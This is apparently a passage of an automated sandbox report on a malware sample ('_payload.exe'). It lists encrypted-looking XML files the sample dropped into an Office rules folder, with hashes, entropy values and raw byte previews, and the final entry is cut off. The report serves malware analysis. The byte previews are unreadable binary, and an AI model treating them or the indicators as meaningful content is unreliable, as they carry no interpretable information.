                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1008
                                                                                                                          Entropy (8bit):7.737101793168116
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:aAJg+BqTMNBgaYtuB0DAbbRZsAKLvxojMFR+R3wibD:xJg+Bk3slKLv3+d7D
                                                                                                                          MD5:1921F3C4532803B9020D97B6CB2A15CF
                                                                                                                          SHA1:02999BE1DB61F63B5BFDF6B7B9E24C0E1A703571
                                                                                                                          SHA-256:67F578C3FCAB89E85FCD197CA2B0A37B15F0F5DF4966BD7C1D7B63CCE08127FC
                                                                                                                          SHA-512:DECE1DC03401B572A2B5EBBBD4E2E997C1FDF3EEA562428AD4E655A9F526CBC634F903F7ABC7C1F7D02E31699FEE05E2BEAE762C9447E59DCE86D9F562959309
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml.7r...B).7..9~.P..P..B..4..PU.q...........JC.i...\G.h...).P.fu..[.&Q....Pp...=.j.^.....g.....0..PO.^..H..;k..A. ...)h....3...W..-.....wy.e.2K!c.n.j..gR7b..........O......o..q.A..K..cz.w..w..G.......@.8...BO...;c..MA...UPd}..w^.....~..g|.&.|].73.|...F....WBO.h.C.y.F.A.....j...S.......F>..(O..........S.S..~.w..:tmF.<.....*.D....E.......7~.q..W..5....U{.+.7y.G.0.HU.),...3..&....M..|.<...o.yQ.B..A.~q&.. .S'..\0Q..H..H....d..s...bQIr..J=..{.s=..d..C.-.......>..f.}...^.R.5..)m....).*.*.....R......#......)...A......Z....K.&..q.t...fD`sB.n.O....g\.H....u8U..]6..(L.{......9f..b.KxLeBw7p........)..'.....R.cY...Cn.I;..fS.h.^kD.raa.......v).....'r.*J^T....t.....#..m[...d.e..<..J.8.ov.W.^..<...`u......i..;.ST....-{Q||.B.....BR.R.}..G<"..'.}\3.}.....-...AP?'gy.8.......9#*/z0 kj....]g....5..MR.~.....I...,....Q...\....A......J...i....e.l1T......y\..,U.1W.........4,9..T.sNH...z.\gs#k..23phJtdHo970vyx7vwlYG00OakDR75RuJz7NXDArt1{36A698B9-D67C-4E07-BE82-0EC5B

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule490005v3.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1028
                                                                                                                          Entropy (8bit):7.811836955485029
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:H8m5qoXrXNKBAIIH7Ze0p1oM3WOehRpV6TmpViRGwg3PSU7+bD:cidFZ1ec1TWDYKmGwg3P/78D
                                                                                                                          MD5:F1B27653D54102FF6EFB9D65ECD18A6F
                                                                                                                          SHA1:AA05D83C11775F00FE6E4BBEB9C0827D697FFD39
                                                                                                                          SHA-256:554AC9C5E9A57C715A54CFB62613650B0E53E986FC815AA97044DD6983567F16
                                                                                                                          SHA-512:2A93CC236B6EF8832BF20D2EFEF5125E988CC5A8B6E0DA69FE5570221FD2869CDD543B6E0B8553DEDC657ABDF47FAE95D9ABD3C0D7D465CCC3D8ED569C21A225
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xmlV2.yS.6....x..,..O..~.[...;#.....l...}^....16...>..`-j.B.E.G....N4..x8.7....uT..X..4w/..j..A.#^.TY.|....'"(..6.".u4.....I.s...|......r..m....%......%..e<..1.I.....j....4$].:.g.HV....g. ..1O.3.O9.,)...c..9.{..=L-..G..&.,.5....%":0l.Z........O>...AN.....8.{...zLn..o.N./.l. ...I..[q.mI.G....=...EJraQj.g|ok...?V..M.Ds....$b.G.k.&&..<..y..[..Y.[B.S...*.[....6.3.&.. L..lZ;Z.......M.3=...=.y...P.I....G\...m{bH.....D.u>..z@...6z~..b m.....+..c.d./..*.....i.O.!.a......hro3..$''."..Nm...p..!.....e..".)".....3...o4q6Sp..Q./.Q.N.Z..T.....P.....]}.....NMfs...V...W..j...@..L......LP.!]....N.7......b../~T.k..?0....7oP.u... ..GG.. ....l.........1............th.{^W..cZ........-..!+..s+..}$=..(6..\.|."Q....t.\......[QF+...Le..;}u.+\..0.=.F.%:....K..N........8./h...7.:.M......].G(.;X]......4Dm...8z...aN..3e..n..N.i.../...3B..?.bQ...`<.O..A.(.6v..".=.g.9.....2U..Zf.=.}Wd."+..7...3...(,0...k..[..2.H|.mY...phJtdHo970vyx7vwlYG00OakDR75RuJz7NXDArt1{36A698B9-

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule490009v5.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1453
                                                                                                                          Entropy (8bit):7.864573932125294
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:2YI/8dytD1OsikzKgrQmKjJjh4QqxlzvhbyZk9DnH5aHj2mmlJVCEZoJveeSV3bD:2YIGy1OiQmKjJ947xlzFxZaq/8EZGeRn
                                                                                                                          MD5:2A94EA764A9B189E82876ED4B62BDA38
                                                                                                                          SHA1:4C65B29395D81E692B6C568AA0DD9839D897375C
                                                                                                                          SHA-256:A6191BBF99E6BDFF31EA087353B1967D57D4A2A6BBEE94A4F457086F8EC168B8
                                                                                                                          SHA-512:3112D19AB2B055C41A3B017F2A40F3597CE47E008929C0D5C88A10C72C7D039DDEDCDB65DF9DE9E1B4FB445808E059D0337F8F95F7BADE5DAE9CFB9BBEC6B324
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xmls....w.....7....wK.....&V&.|b.'..Ih..~.....t..Y.3.$....np.....=i....[...].L.H..dwX.L.&q-...>...S.n.,.?!h..3..9)l..Nc/..c...fp.If..]L.5.f{..'.7b.Q=X...1.b..$.5.:...7...{k.7...x.7h..+.?.t*....q..\...,.%?..d6.].h..d..+..%..]....z,...^.v.5........_.j.`...@N.R7..l.Q....|5Z.....p.R.R...x..?.X[:.:/Z.....D.n...6..f...G.[........6.^.w.......x.......,...c.{7.A..P,N...=9.......Z.PTl.......M..)..d:sG.izA.....{6.Oj..z. "...[....l..o..ob@.^.(X.ItO...j....1.a...9GUq)*j.zX.A.Jm(.%.um.....%D....M...w.TlA.]u....QW.:P..%...&.....r.eE*.~..3.W4.^.x......*TU...h"..&b..e...f!...uT....u.Do.+.Z...;..AC.g..w5.._x]|~.OuC...T..[.x5.`......d.........LgD/.&.B...;.?.`..q.|...d..(}h...<........#..I.<<Qy..$.X...@.b..g...u.!.#.}......=`.G.1.q......%v.&.....)....f.c1t.9.._......V..........*.!...G..a..i.I..:.]....d.?[..(.!.Z.....G.f..%....f0..%\.s..$.....{N..pE...:.%..N.Y=*./PC.=.U..>I/ ...5.,..1r.?...Rh:.V...a..>.mQ.0.S;.9..m.D.#.*....Jm.<%..8=..-4.._...".......B..r..1 h.

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule490010v7.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1388
                                                                                                                          Entropy (8bit):7.850354044483704
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:50sY7bs9I0ethj8EAoEvlw2lN9O4TBdWHEyxS0rQ7dV4R4MHVLhDINzbD:50Xv10eth5AoEqsN9O6d9y10dV84MHVs
                                                                                                                          MD5:898EC9831EF02EA290263621306FE38A
                                                                                                                          SHA1:8AB2225164672D51EF9DB2FD3349E8E52FD667F6
                                                                                                                          SHA-256:539359ED2DF8EEB09BB17A7B750B64E889F6EEB0D4F33F9BC138925721DAEFC2
                                                                                                                          SHA-512:625A0F92541ABAE7A39B7A0A709BED2EDFCB26D8E43C818BE7F949267B350109B64702DD82D62F8465BC10DB631637AC322966F665E6C7FC6A99414674638538
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml.R{1.6.......b4d..O.....Q........\]XoB.i....QJ.....r.Xs.5XH...B..B.p.0.9...Y(f.S..;.=-.|>.z...|D....j.p.zX..AvJP`nI..P.....90..:0...R.n......c4N..".C'.R..)....S.a.j.].......I..$..vXAKd<N..)..A..=[..b.1....n..r.+..C....R$.^...`...p..,tZY....~G...~Y..<.7[...Ji...E.3..j..)...H.[.b...Y....e...`.$...|...-c4"Yn..u).Z..2...oG*...W,...m....4..n...|*.....Hh..[..X...R...m..R...'.5d.a.!..(."S.........h.@.....W\..C..%]....5pf....Do}...W...B.*t2...OC.3.yF.r..n6....)..K...a.Y..........p...q.O..L......2A._..o#y..[..r7.oE.CXx....l?.>..f.L.\.P.j...='.....9..o.......8.mZ.w'.@._.o.....!_f.$X.8...y1.T..G..."..`.."8iv....6.y....uQ..+.`..G..*..?...+.^>..DB..7..u....5`=Wah.n.w.^I.@]..p....,.c.&...i%...4...ZJ.cI.]..o.a\u.;..w..Tjrw.s.'u...y...X..u..PX.pN..b.P..O".........1Y...k...&+..J<......f..@...M.<Eq..Z.s.x...Z.C..V.&nX.~...Y.w.[..0K.{wc.\..~.....n"~.vm/u......+..*..4sV......u.p#.........Y....k..'Jj..f.l..h...=D.>........oIRr..K.E.X..P........6).6X\

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule490011v4.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):856
                                                                                                                          Entropy (8bit):7.730160793388376
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12:z6LZu4R1fDGZ6B4q0fqj4S+OFdVU4U8g1HA2bun385cB+DzBFFLH1YofvOhzOqua:GN1fDn0fe46Y8g1HbbL5cGTfSOqxbD
                                                                                                                          MD5:BFBEFD256E94A9616C049D4D34F4BABD
                                                                                                                          SHA1:B4027AA39B5480790D049E388BB1AC3627084100
                                                                                                                          SHA-256:7D012E176601D4ECDF6DA9279730E64CFCD78E87970CF87A2E24DA3707F5F2D6
                                                                                                                          SHA-512:C7243AC629250DBF318952E3882BCB031A9D2CEF3DF66D949C726262C81F8A5EE3001D3A2B7DE80EF3459B9433CC5FB1E477981FD9C8D7E0AA588152730C2BC6
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml2<..Gr.[q.DR....t..J.U']Y3..../9.Z.?.g.:.5.B...3r..K%?do...a.....t.^..^.F...U_......{C.t..0..7..+m....~.]./....wT3.ygJ.L..>...yx5.m....A;.a....#.zJ.^F......tR.[.....g.... ..Kl.'.W$..\.1..85.o..)Bo....RS..d.../..t...}..`l..{I..x..n.?!QK.R..Z..E....f7`j.lU.[.\1}s.c.c..<.A...f)I.Ef.e./....15..m.oka.f/y...%.G.$@...=.m.[.}.0A...........i.7....~u`....%*.(rB.U..m.paJ.%+:Bj.p_.;.K$..Ps..#R.....K.....n.....7..(..z.?....DR...#=.O...v;.....).K...;..o.%Ei...%..*.I!UTC.. ..(..o.....\)..&...U....96....tJ;..f8.s...6...L...g..^Ax!..l.Gb.t.k^y..;.w.e@.6t@.;.......<..8.D.:.....?..yKq.LX._...;...H.w..am.....?.#..../.Q..7ii.>.....P.......r:......~.p.9*../..}..0..8......rk...Z.2..b...>.pEa..`......l0....-=.w....W.=..l...k..Ma,X...p.y.......Og.:1phJtdHo970vyx7vwlYG00OakDR75RuJz7NXDArt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule490014v2.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1084
                                                                                                                          Entropy (8bit):7.828433100702178
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:KheAy7k1hrUd2Q5OdeOXDkWPl0MD4kCUXLLu4pJvf/q5Xi9BYGdeSY7f+zR+bD:K4ELrUd2j4WyMkAbN/vf/qliAGif+aD
                                                                                                                          MD5:B91AFC9F1D537E09037B01A4100C2445
                                                                                                                          SHA1:893C2A282A71A855DFF964937054807F4FA6623B
                                                                                                                          SHA-256:289D3D024E174A9E19EA40C440259A728E53FAD6A849A9877FC06CE80F0352C8
                                                                                                                          SHA-512:20E50E25EDF4586D4B2972E5E3F53963BB17B8C1DDB886569CCAB9B7BD88012CBA186AD226CC17BC07C60BA72DF900E11DEBA10B9ACC1DE094BE59775EC12260
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml....g..%BV.H.F...;p~*.&.,..TK..,.+.....?`.t.,.&...K..09.K...3R.t(LM...$e.e..w.)...n.....d..E.'....AK1.N...zx.Gw.1...;..1....R.k..'`8.Q....U.......[-O?....)....jU...i1akC.UE[(...-z.`*B.EL..#b .,.nk..?...tBL....Id.......o..8Ll.M.U.........k.-..@.../.....R..P....iZ.j9oJ;.w......V.e....$.._.@..?..{@..J...u./.=..W..&s..e ..r8f...x.y....&P..I.I..&...U.q..dY9.E.3m:...........P.U......]WX..u.|.@..q.... ]>.hw.a^.UM$W..r)...)...|..1...<..K.,.{.-.-.._..c.fx.d..6`...n....jH...Y%...5?..,........q&Fq&u:...V.B.8...9bU.........8.u.#C...).2we.p.S..Z. q....&Y6.?..........*..z....iBU."..}X.[.....d.....!.!J...n?R%BH.X.....M?.)lB..!7..uw.4<...t`=..\.I..lh|...U..jo........'.<.s...)..S..t...U.r!6..r.'.q....lD.8.N.=....8..e.......cf.........'.cJD.k=..(._.._m.. ..>..x6B'....Ns.Nbo...|.L..v....^..`.C....|..Q..P..n0.p. %'..H.b..ls.X=..Wp.....L.g...[i...W.......#.......q..R...O._.kO..@...5qO..z.*..e-..?.F..@..1..T.&.AQ.W...uY.9#<.0.B>.UQ:.541...~....

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule490015v2.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):924
                                                                                                                          Entropy (8bit):7.770908024593909
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:QFTP/JNq6NrA2LLjdlYi+6X0U+erGdEAVPvEXg+9bD:uBdNrAgLjXY0B+eqdEicXlD
                                                                                                                          MD5:87258D4A82D30415C97D0CC9546F3AFF
                                                                                                                          SHA1:96E99FD700964BE823AEC4296AA9ACE2471AD39C
                                                                                                                          SHA-256:847E9FCCB2430EF7C43363509EDE350A75209C309E7E7CF62DD37C115A4362B3
                                                                                                                          SHA-512:41821F40F4E289CA65F2E43C2418CA56FC59DB083652DC49193D5D7C48B95096C62AB7445E09881770E8E5844A0B6E41DDBFC02E27C89AF173C7AB01064FEB7D
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xmlX8DH}^Wq.rCS.x.%5r.Q#....3...a.>f..)1.Im(.~,(..,C..*K..qSxt&y0v...d.6u....X.....Ge.I,.u......f.Wl.<j.b.Fv.AKsi.,>s.,.D(..*.g....hG.*;).g.U.].....i...c)...dPV....h..p...[.O.....rF"Q}W.).$V.1..o.;..........<w..T.g1d:.H ...y..O...E..5..&.@ .).<.D...[..p...r1X.2.L......=K.{.t..$$.{.Z...yS%.........._.0T}......wL.c..b..Ev.C+].-96D&...]o.s5.R)..u.x.{.Q.K...i.T..9...keS.........{0..K=...2o.....z......n.1.9..g..I../U.#.D.`3..'.O..".%....i.K.3.x..F*...kE.....h...m..9x]....tq.#(c..W}3E=....7....e...~s....V.E...z......-......S1..._._...J~T.....r.v;.........'.O..Ds...z..KG(h.b..k......R.'.......FpPV...j<=......&(....xR.....[...gw.R..R.N...F..R.......<..;.Ia....J..P..aj... <....Z......C.....&.=.....@.Ni..X...9-.....'...e!S.Ik..OT...e|..t...,\G...W.."X.....,<.c....z).w.D?.2..O.............c......f.phJtdHo970vyx7vwlYG00OakDR75RuJz7NXDArt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule490015v3.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1090
                                                                                                                          Entropy (8bit):7.821804416546545
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:3NmBMDlnL1rnnNghoBCRHK9OQAWa51/qrJPp+bD:3NmBalL176hnRHKQWa5NqrJeD
                                                                                                                          MD5:825F6995BF88FDA166E6E64F2FAF27AF
                                                                                                                          SHA1:8D40BF9C328D254A55A8B5BEBDAEAD165A46ADCD
                                                                                                                          SHA-256:8B40C58349CEA35F92BF9DE397ECA7D946826661B12E86C040AACD2EA3B32404
                                                                                                                          SHA-512:45A07FF11AF3F593B41340FE81FB97342141ED5AF0ADB2094DA7997B1EF83E6C26D502E5223A1D0A4D2523ED3617D995D7D3E30C9027D11830DB726C29BDC4D5
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xmly....p...R.'j]y...@...u.M..r..N.q.n.'4.k.D(..f....V."n....~e...`....sq6.`e....s .+...(.;.V+..K..........#...CA.X.<....r(.....E9.L.[....~...uDC...8.f.X....Yl.Ns..?.L....n.h81.:.=`0N...F.oVW[;.&G......i~_.h...[H .$.2...b.....1....3.4.T?..I...3...V.J).kl..I?g .R....E....B....mH....I7..]Pl...N....g~h.'l.W.......D...&.cM0_.<.c.H)....-%.....::....g...pj.e.+...N.t.'..Yf@.a.VgT.....C..3iJ2......$.$.......[..C..^.K...s.l`.Wi.H..zT}.. M.ojx.e..Z.0.......X..+hg .u...D.....R.f..Y...>m..}y.6.;LD.....5..;.%P....)......sKC...4..V.f..B..=..Ya..?.....I,S..w. .n..6e..L$....E.s]#Ze. ..s...G..@#.f.;.........kU>..XC....4....KZw`-{....F..`.4X.4w..G.0.".P{A.E..2.]l,........n..??.........N.{Bn,e...-.o.#.)}0^W..a.1....Q6.'....5...D6....-....x.J..........k.F.J.Nm%......^m._..a.i.X.m..j.u.K%..i..a`i.P.F.d...}.....Q..+...O>..j.;....=..}X.Ii.=.9g+..TD8%@R.-..^.I.......&.l..../Y.+I.............v..uf7CP.qf./...2.8.......zS....Z..N.....nO.N...Jh.+[.T..7..Qo..].

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule490015v4.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1090
                                                                                                                          Entropy (8bit):7.807355700823377
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:AqdLckNch63qTa1cahduRMXIdOzHViJ8C2IxnaHTQeNubD:AkLVyXTa1eRMQOLIYIxnaHTRMD
                                                                                                                          MD5:290126FC71BC62F64C0A99136EAEDC89
                                                                                                                          SHA1:703CE1C2087CD3A3712CE353ABB0504C22B119C7
                                                                                                                          SHA-256:9EA24AFAD0AEBF89D0A2508CC48BD5F3E354DA08EFF2E1AD276F83065571319C
                                                                                                                          SHA-512:1CDC03817998039B7CD571A3FC70DFDE3A046922804127A5F544F8AA3D4DF555D767D756864AB5DEA8D33F9F477528908AA70F027C4C426D782304D6A079D9B5
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xmlf,. xM..beIO.f.c.......t..;...$O..f.z#.M.kKUL8US.;..).1"...I.....p.....7.`.AR>K.C.,..J.e.0....!...!.k.[kbe..z...2A`..Q.K|..yK...x...<..=V...s.i..S.l..w.a|.*...z..(..[.....~..MuK2.....)..b....l.2{.......N..k.....i...$.]%..{.5.7r.......QJ........1.~..7....y<...t.F4?f...)...E..$.+..B&...E....-.Mc.....c ....{s.<.Z../....G.V....../..{f.....;...,......(8CQ\..>..{.mE..pQ...N.>..$Q#.n"2.5r.u.Q.....o5.I.!..Wt1I.rK...i..G.=......`N.4.H..<-,I1.....A..r..4.{F:.\Q8.n....x4.*.\.R...&...0......,k.;1>|.B..G....<A\aO.[B..A.9.m....m.8i,.|..r.CM.x.....-.o;r....s.?.._W..6</.y....5$D$!..nL.G.......S............t~[..&.%....x.=Z.;..v..k..'Y].p.g.C.]..[.TC..N._......y.h.I.v 1;.TT..G...o..BT..fX26s.......e.%....!....:.O.....3.....=.~5A...o...gf5.a9.f@v.z../x.0.T.\......9...X^..)....S....|..J..G.......\jSw.>.:.*>..Lk0oXR..l2.)cv.._R}.%%..T.....6.5..P!.t........>........Xp=....eUU..d...O.`..<...S?...G.*..0w..f.....sm...iA...n.....wX....1..l..T..wV..._'

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule490015v5.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1108
                                                                                                                          Entropy (8bit):7.803158515949767
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:2cb7SLi6t5npOEWqWOh7mU6ScK124+mzsXyHEOuLVJoz5Lpw8lp3A6WK+bD:2a25n1WqHh7m4+mzIqEOuLjozZjplr8D
                                                                                                                          MD5:FB9C125432B416DC0CDF4C2F98D29CDF
                                                                                                                          SHA1:361417A13E0D8D9D7C6837E698A61CBE848F48A2
                                                                                                                          SHA-256:1119F4D27703AA0763FC3F7D87C94C7A18D16FC1FE2879AFA07E5968B54F77B3
                                                                                                                          SHA-512:198C067AB6C460DA48908F963A85B66F65B90BCC84EB2AC615E9A83AEE455B780D6AC3A502CBBB8477B4710AE1AD7E255DF47AB673BAD1A023DBA0F216684DB0
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xmlVk7..te..a.)..U.......y....oI..&f.....[q....Wi.`.J..v..........r.......I.f;......B(.A.:w.ZP.O.j...J...x{+.`:}.N:.DQ.|..$G.u.a.2..%S.2.U2...TVq....X5.o...L.q!i...l.w..E.MI.("...J)....<8{h...z(AF...Uq.....C...N..<..a.\...h.h.....r.UO.9.......#>.Y..'<..r]..zo~..\D..^.....S9Oi9..S....Z..........,....SC9V..Q...:......K.\....'.|..W.S}'.Sx....t.....G..".|...(.P.]OX`..?.#...e.{...|'..k.d.9.@M..j>..:.q...........:....O......hEkJF.....~..w..@..dq..c.h:.tex.e....(.N.....;.`.vhU.=K.F...$.+..."2..g.].T..Z..|II{....L....~.<K.S5M.'..v....T........Q.5.:....{...[.3.,.c6.&.M_.YJ.........C+...X.I.l.TN.\.../......C7...Q]..i.^....).Q.l:.:..;.S......RQ.'...x..F......o'%_..}...G>.s.^*.<.S........z...5zhs..G..*..4...>.I.N.`9....g7..&r..U.....$Gr..(Fc.:...N..[.k...O...U7.aZ.....M\.j.A47....6.^x.m..r.N..|c..U!I.z=$J........1;......%...q..iP.....&.W.K..I.{...z....i.*.!....v0..2.._Nx9F.]N..b.b.=...P|.h8.......2.L.\.,,.....$..>h.n0.w.C.6.....w.Ny...S..2.y<.b.xA.J...

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule490018v3.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):934
                                                                                                                          Entropy (8bit):7.78672896633001
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:SUMbbpr/dz4XzUTkQxNHcdzmSTt5b8x5WbbD:0npr/mEkQx9cdmSTtux5WfD
                                                                                                                          MD5:DF31C8F72BD0DC2CBF21732CCDA5AB1A
                                                                                                                          SHA1:2F4B41BFD553D023825321C55FFF28AC9F65D525
                                                                                                                          SHA-256:2B7C135B6DF763FA0EFEDB6161555B7D58AE867349F69F36EDE0C36A2300A9B8
                                                                                                                          SHA-512:5EAB39B4FB5E0FA5385A6159067311D1CD98DBCD9638A5D1F932C80A1758B1B3947E0979C1BC5B6C992BE1FCDFE5B6783EE0A060D746FBF08CA9EF9EA1C5F4C5
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml.t....K.....0.D...y|.X. .i..k..Y.t.pB)..,...?.+...t".ru*u.Q....o....f.yV..h.lk.tU.....W.9E...t.~."~........bA......Y-.&.0t.e.O._..:<.g...~../Aj..MGzV.K*.7.b..Zl.UV.kK.L.'..$.w~.U.......YH......}.....".N.L1.[.'..~..&..>.I....'..<..+V.I..JL..?<dS..4...t..D...bn.)....cT.7uK..'h&.....*.#LB..d.8Wg...:..d..-Bk...{...z......lt.*..D...F..........C..OLi..M.G.F:R.~.I.Z.i...5.....*r. p.r+..o.9i..Y.q.vCE...Dk.&'.{.m..:....mJ.6.>.*...d=u....[.'..0...y..'.S.>.1'V9D..If.}...cn.j#..I+.Br./...5...!}\...@rB.['oa.&-.......a.|FgA..XR...v.....g..*...fS.w.w..k..H.>.%.a].8q..wT......{\.E_...t.`..w[C.7.A..^..5..Zz&.w.@.9...1U....:..+.-. p...=....`..O).=..3I.......|D....m.T..j.%].vwA....^!H..TU...Q.w.!.J..{h.`....u;P.....J...b..G....;...O~*...o..%S..H.7[..=,K.>8/..Pq.:5..O...P.#.....6..j.n... .eR...\..........#..b*.phJtdHo970vyx7vwlYG00OakDR75RuJz7NXDArt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule490020v3.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1126
                                                                                                                          Entropy (8bit):7.805975077851801
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:hSBb2GlVSqC/kMf2DhShpyqHTDTrmK4+2lGv70aVhY0knbM+/VbD:hgtC/r2upyMnTyKWmXj4MUD
                                                                                                                          MD5:FEB7B42E3A084E734A23B59F8098FAFF
                                                                                                                          SHA1:2F27EB7FFD3BDB5CBFFF36B333808E93A2B4886D
                                                                                                                          SHA-256:B1563DB45C365233A671B4D341943F6F286FD571AEC199E984A2F887CA3D2133
                                                                                                                          SHA-512:79526CEAE847010348E9D9AE7D677093B06517ADDE05D799B1869D322534917DF946B7A1AA24AF204049C74AC6B8E49914B12648EC9EB97BCAF2C33EBA3CFFAF
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml.a.`Ag. .*.o.3.".[.....@..i.....HT...rD.....=P}...f.;5..8.{.N..U']y8;./.MG.oh.Jqs...B.....bNL..<. ..B.b\.'.,.Y...l..]1:...9.B9.A.2.-...4........}.x....9.m...0.p5........v...q..xr..........s.$3g\......E.d*.<......-*...a1yb:R.y+.[.......nE..|....]w.#.W..Hu4'....t..F.$rc.{w..q...+Y..l...u.A..{...QX..*R...r.O%.s..O......2.-+R..}..a.lP......4.dU.^.3.....2.L|!L@(i.4...Y~..xR0.Me.".r..D4..i.*?b.~j. .......]..........6j0...Y.....Y.........6"n....#....mC.=...-.S^...1v.S.....zG...."~.._...Z...R........+.i.~..o\bm~=...+.`...a..8....wxi.P..{...|EA.`J..y..h.uG'.5Z...u{.^.f..."L..^.z{.EHAaB........+...`.I"..X...O.,t.y....F...a.......>....d.....PG.....w.B.4.D:S...E.......d*......>#J...9>.|..Yx.....Qpx..@C.P..ux.....=.[.s...T....}E..zz*..f..8#...x....M.S..........J.s,...P..4..L..8..6.O3...)q0.J)`.W.-^.I..%.~..4..IH.GA.......&[.gt.8WW......7.......;#..j..<4.....b.!0Pk....l^..?BI+(.G.K..k....oK.."........6.t.[.PR..c.......x.2F.p.....n..J.$..%...

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule490023v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1243
                                                                                                                          Entropy (8bit):7.829057223975967
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:wtdwwuhQmHjGzQhxGtXKjYPtgqedxC/GxUDzzUzGMpTNsn2xwKA8wGkrzyz+BGbD:wtSwOQMqQhx4aUFVX/zQz1NG2S8wGyzs
